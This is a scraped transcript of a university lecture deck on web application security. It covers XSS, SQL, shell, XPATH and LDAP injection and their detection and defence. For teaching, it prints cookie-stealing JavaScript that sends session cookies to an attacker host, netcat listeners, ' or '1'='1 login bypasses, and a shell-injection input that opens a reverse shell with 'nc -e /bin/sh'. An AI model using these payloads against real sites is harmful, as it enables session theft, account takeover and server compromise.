Presentation is loading. Please wait.

Presentation is loading. Please wait.

Web Security. Why Web Security: a Real Business Problem > 60% of total attack attempts observed on the Net are against Web applications > 60% of total.

Published byLucy Moody Modified over 9 years ago

Similar presentations

Presentation on theme: "Web Security. Why Web Security: a Real Business Problem > 60% of total attack attempts observed on the Net are against Web applications > 60% of total."— Presentation transcript:

1 Web Security

2 Why Web Security: a Real Business Problem > 60% of total attack attempts observed on the Net are against Web applications > 60% of total attack attempts observed on the Net are against Web applications > 80% of vulnerabilities discovered are in web apps > 80% of vulnerabilities discovered are in web apps Independent security audit Independent security audit Regulatory compliance Regulatory compliance

3 Auditor finding Freeform edit box Freeform edit box –Message to Customer Service XSS issue raised XSS issue raised Must provide a response: Must provide a response: –Prove issue to be a non-problem or –Describe actions to take

4 Web Attacks Cross Site Scripting (XSS) Cross Site Scripting (XSS) SQL Injection SQL Injection Shell Attacks Shell Attacks If interested in more XPATH Injection XPATH Injection LDAP Injection LDAP Injection SSI Injection SSI Injection JSP Injection JSP Injection

5

6 Cross Site Scripting Attacker goal: their code into browser Attacker goal: their code into browser XSS forces a website visitor to execute malicious code in his/her browser XSS forces a website visitor to execute malicious code in his/her browser Count for roughly 80% of all documented security vulnerabilities Count for roughly 80% of all documented security vulnerabilities

7 XSS Risks XSS abuses render engines or plug-ins XSS abuses render engines or plug-ins Steal browser cookies Steal browser cookies Steal session info for replay attack Steal session info for replay attack Malware or bot installation Malware or bot installation Redirect or phishing attempt Redirect or phishing attempt

8 XSS Example 1 Trudy posts the following JavaScript on a message board: Trudy posts the following JavaScript on a message board: var url = "http://machineaddress:9000/index.html?cookie= “+ encodeURI(document.cookie); </script> Then run a TCP server listening on port 9000 with e.g., nc –l –p 9000 Then run a TCP server listening on port 9000 with e.g., nc –l –p 9000 When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

9 XSS Demo Instructions Set port forward to bypass the firewall Set port forward to bypass the firewall ssh -L 8000:netsec-demos:2000 ychen@netsec- 1.cs.northwestern.edu ychen@netsec- 1.cs.northwestern.eduychen@netsec- 1.cs.northwestern.edu Note: 8000 is the local port, it's forwarded to netsec- demos port 2000 through netsec Use http://localhost:8000 to access http://netsec-demos.cs.northwestern.edu:2000 Use http://localhost:8000 to access http://netsec-demos.cs.northwestern.edu:2000http://localhost:8000 http://netsec-demos.cs.northwestern.edu:2000http://localhost:8000 http://netsec-demos.cs.northwestern.edu:2000

10 XSS Demo Instructions (II) Login as ychen and post the script with a sexy title (e.g., hot game!) Login as ychen and post the script with a sexy title (e.g., hot game!) var url = "http://dod.cs.northwestern.edu:5000/index.html?cookie="; var url = "http://dod.cs.northwestern.edu:5000/index.html?cookie="; url = url + encodeURI(document.cookie); url = url + encodeURI(document.cookie); new Image().src=url; new Image().src=url; Hi Everyone! Thanks for your cookies! Hi Everyone! Thanks for your cookies! Ssh to any other machine (e.g., netsec.cs.northwestern.edu) and run Ssh to any other machine (e.g., netsec.cs.northwestern.edu) and run nc –l 5000

11 Simple XSS Code var url = "http://machineaddress:5000/index.html? cookie=“+ encodeURI(document.cookie); document.cookie is the browser's entire cookie for the current website document.cookie is the browser's entire cookie for the current website encodeURI() is a javascript function to hex-encode certain characters to be included as part of a URL encodeURI() is a javascript function to hex-encode certain characters to be included as part of a URL –E.g., changing the space character to %20 –Make the URL less suspicious

12 What can Trudy Do with the Cookie? Another user test458 login as and when clicking the post, cookie is sent to Trudy Another user test458 login as and when clicking the post, cookie is sent to Trudy Crack Bob’s password (MD5 hash in the cookie) with John the Ripper or any password cracker Crack Bob’s password (MD5 hash in the cookie) with John the Ripper or any password cracker For more info, http://netsec.cs.northwestern.edu/resources/passw ord-cracking/ For more info, http://netsec.cs.northwestern.edu/resources/passw ord-cracking/ Use a Firefox plugin like Tamperdata to reset your cookies to impersonate Bob Use a Firefox plugin like Tamperdata to reset your cookies to impersonate Bob

13 XSS Example 2 Trudy sends a link of the following URL to Bob that will take him to a personalized page: Trudy sends a link of the following URL to Bob that will take him to a personalized page: http://host/personalizedpage.php?username= document.location='http://trudyhost/cgi- bin/stealcookie.cgi?'+document.cookie http://host/personalizedpage.php?username= document.location='http://trudyhost/cgi- bin/stealcookie.cgi?'+document.cookie A page is returned that contains the malicious script, and Bob’s browser executes the script causing his session cookie to be sent to Trudy A page is returned that contains the malicious script, and Bob’s browser executes the script causing his session cookie to be sent to Trudy Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

14 XSS Detection A client usually is not supposed to send scripts to servers A client usually is not supposed to send scripts to servers If the server receives … or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet or in an outgoing SQL statement to the database, then an attack has occurred If the server receives … or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet or in an outgoing SQL statement to the database, then an attack has occurred –A sanitized script could look like &ls;SCRIPT>…

15 SQL Injection Malicious SQL statements run on a database and thus attack the server –XSS can only target other users

16 SQL Injection Example Trudy accesses Bob’s website; in which he does not validate input on his sign in form Trudy accesses Bob’s website; in which he does not validate input on his sign in form –Runs a SQL statement like the following: –select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe’; Set username to ' or '1'='1 Set username to ' or '1'='1 select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1’; select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1’; Effect: picks any row where the username is blank and the password matches or any row where true. Effect: picks any row where the username is blank and the password matches or any row where true. Add “limit 1” to pick the first row Add “limit 1” to pick the first row

17 SQL Injection Detection To detect and prevent this at Bob’s location To detect and prevent this at Bob’s location –Log any traffic from Trudy to Bob containing form data containing a quotation mark –Match any outgoing SQL statements from Bob’s web server to his database server and verify that the quotation marks Trudy supplied were escaped –If they weren’t, take action

18 Shell Attacks Control an actual machine like a web server

19 Shell Attacks Inject commands into scripts that use Linux utilities Inject commands into scripts that use Linux utilities –E.g., with “;” as command separator in UNIX/LINUX CGI programs like perl can use command-line programs (e.g. grep, ls) CGI programs like perl can use command-line programs (e.g. grep, ls) Unsanitized input as arguments can lead to command execution. Unsanitized input as arguments can lead to command execution.

20 Shell Attacks Demo Search engine in MiniBB webserver executes Search engine in MiniBB webserver executes system("echo $user_usr ". $phrase. " >>/tmp/searchlogs"); Put phrase as: >/dev/null; id; echo randomdata Put phrase as: >/dev/null; id; echo randomdata –Hide user ID –Store random data in logs to evade detection We can even get a remote shell ! We can even get a remote shell ! –>/dev/null; nc netsec 9000 -e /bin/sh

21 Defense Approaches Web firewall/IDS Web firewall/IDS –ModSecurity for Apache –Commercial: SecureSphere from Impervia Static code analysis Static code analysis –Open source: Nikto –Commercial: Acutenix Web Vulnerability Scanner Acutenix Web Vulnerability Scanner N-stalker N-stalker Education on good coding Education on good coding –HTML encoding on input (server-side) –Input validation/filtering

22 Backup Slides

23 XPATH Injection Example Similar to SQL injection Similar to SQL injection Bob has a form that does not sanitize user- provided input before using it as part of an XPATH query:: Bob has a form that does not sanitize user- provided input before using it as part of an XPATH query:: –string(//user[name/text()=’USER_NAME' and password/text()=’USER_PASS']/account/text()) Trudy again can provide the following password to change the statement’s logic: Trudy again can provide the following password to change the statement’s logic: –X’ OR ‘x’=‘x –The statement thus selects the first account

24 LDAP Injection Example Server using LDAP for authentication Server using LDAP for authentication –User name initialized, but then uses unchecked user input to create a query filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry Attacker can exploit using special characters Attacker can exploit using special charactershttp://example/ldapsearch.asp?user=*

25 LDAP Injection Detection Detection is based off of usage of special LDAP characters Detection is based off of usage of special LDAP characters –System monitors input for special characters –Either scrubs incoming input or watches for unescaped output passed to database server Detection approach is blackbox Detection approach is blackbox

26 SSI Injection Example Bob has his server configured to use Server- Side Includes Bob has his server configured to use Server- Side Includes Trudy passes input with an SSI embedded Trudy passes input with an SSI embedded SSI inserts malicious code into normal webpages upon next request SSI inserts malicious code into normal webpages upon next request Future legitimate users get content containing the tainted code included by the SSI Future legitimate users get content containing the tainted code included by the SSI

27 JSP Injection Example Similar to SSI injection Similar to SSI injection Bob has a portal server configured to use dynamic code for templates Bob has a portal server configured to use dynamic code for templates Trudy passes input with an embedded Trudy passes input with an embedded malicious code inserted into webpage malicious code inserted into webpage

28 JSP Injection Prevention Prefer static include Prefer static include Don’t allow file inclusion outside of server via Java2 Security policies Don’t allow file inclusion outside of server via Java2 Security policies Firewall rules to prevent outbound requests from server Firewall rules to prevent outbound requests from server Input validation coding Input validation coding Choose portal software not requiring dynamic includes or code execution Choose portal software not requiring dynamic includes or code execution

29 Q&A Suggestions? Suggestions?

Download ppt "Web Security. Why Web Security: a Real Business Problem > 60% of total attack attempts observed on the Net are against Web applications > 60% of total."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
TEXSAW 2012 WEB SECURITY CRASH COURSE TexSAW 2012 Scott Hand.

TEXSAW 2012 WEB SECURITY CRASH COURSE TexSAW 2012 Scott Hand.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.

COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz.

Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz.
How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.

How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.
SQL Injection and Buffer overflow

SQL Injection and Buffer overflow
Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.

Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.
Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.

Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Similar presentations

Ads by Google